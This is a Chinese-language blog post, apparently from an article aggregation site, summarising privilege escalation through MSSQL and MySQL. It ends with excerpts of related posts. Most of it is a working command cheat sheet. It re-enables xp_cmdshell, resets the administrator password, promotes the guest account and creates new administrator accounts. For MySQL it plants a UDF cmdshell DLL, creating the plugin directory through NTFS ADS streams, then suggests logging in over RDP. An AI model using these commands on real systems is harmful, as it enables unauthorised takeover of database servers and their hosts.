彙總 資料庫提權(mysql mssql)

2022-04-25 03:01:08 字數 2846 閱讀 2493

幾個命令

# 檢視是否存在 xp_cmdshell(返回非 0 即存在)

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';

# 不存在的話可以新增

exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int;

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll';

# 檢視是否開啟了 xp_cmdshell(試試命令是否能成功)

exec master..xp_cmdshell 'whoami';

利用 sa 連線到伺服器,然後執行命令

exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 1;reconfigure;
提示成功

然後利用 sqltools 直接執行命令。

也可以用 sql 語句來執行命令,三種方式,一般都喜歡用第二種。

exec xp_cmdshell 'command';

exec master..xp_cmdshell 'command';

exec master.dbo.xp_cmdshell 'command';

修改 administrators 的密碼,比較方便

exec xp_cmdshell 'net user administrator test123...';
修改 guest 的許可權

exec xp_cmdshell 'net user guest test123...';

exec xp_cmdshell 'net user guest /active:yes';

exec xp_cmdshell 'net localgroup administrators guest /add';

新建使用者

exec master..xp_cmdshell 'net user test test123... /add';

exec master..xp_cmdshell 'net localgroup administrators test /add';

這一步和mysql的版本有關係,不同版本上傳的路徑不一樣,沒有lib檔案的話需要新建。

# 版本小於 5.1,上傳到系統目錄下

c:\\windows\\udf.dll

c:\\windows\\system32\\udf.dll

# 版本大於 5.1,上傳到安裝目錄下

%mysql%\\plugin\\udf.dll

# 查詢路徑,後面加 udf.dll 即可

select @@plugin_dir

# 常用

# 查詢使用者

select user()

# 查詢資料庫版本

select version()

# 查詢當前作業系統

select @@version_compile_os

# 查詢讀取資料庫路徑

select @@datadir

# 查詢mysql安裝路徑

select @@basedir

# 查詢 plugin 的路徑

select @@plugin_dir

create function cmdshell returns string soname 'udf.dll';

select cmdshell('ipconfig');

drop function cmdshell;

delete from mysql.func where name='cmdshell'

可以直接udf提權工具搞,新建使用者然後直接 3389 即可。

使用ntfs ads流建立lib、plugin資料夾:

如果遇到 can't open shared library 的情況,

就需要把 udf.dll 匯出到 lib\plugin 目錄下才可以,但是預設情況下 plugin 不存在,就利用 ntfs ads 流來建立資料夾。

select @@basedir; //查詢mysql的目錄

select 'it is dll' into dumpfile 'c:\\program files\\mysql\\mysql server 5.1\\lib::$index_allocation'; //使用ntfs ads流建立lib目錄

select 'it is dll' into dumpfile 'c:\\program files\\mysql\\mysql server 5.1\\lib\\plugin::$index_allocation'; //利用ntfs ads再次建立plugin目錄

執行成功以後再進行匯出即可。

MySQL資料庫提權小結

這裡的前提是獲取了webshell是最為方便的,直接檢視資料庫的配置檔案即可,如 conn config data sql common inc等。上面的方法有個缺點,就是給當前 的資料庫使用者的許可權比較低 不是root許可權,不方便後面的一些操作,那麼就需要這第二種方法。安裝目錄為 data m...

滲透之 資料庫提權

啟用xp cmdshell use master exec sp configure show advanced options 1 reconfigure with override exec sp configure xp cmdshell 1 reconfigure with override...

MySQL資料庫提權小結

這裡的前提是獲取了webshell是最為方便的,直接檢視資料庫的配置檔案即可,如 conn config data sql common inc等。上面的方法有個缺點,就是給當前 的資料庫使用者的許可權比較低 不是root許可權,不方便後面的一些操作,那麼就需要這第二種方法。安裝目錄為 data m...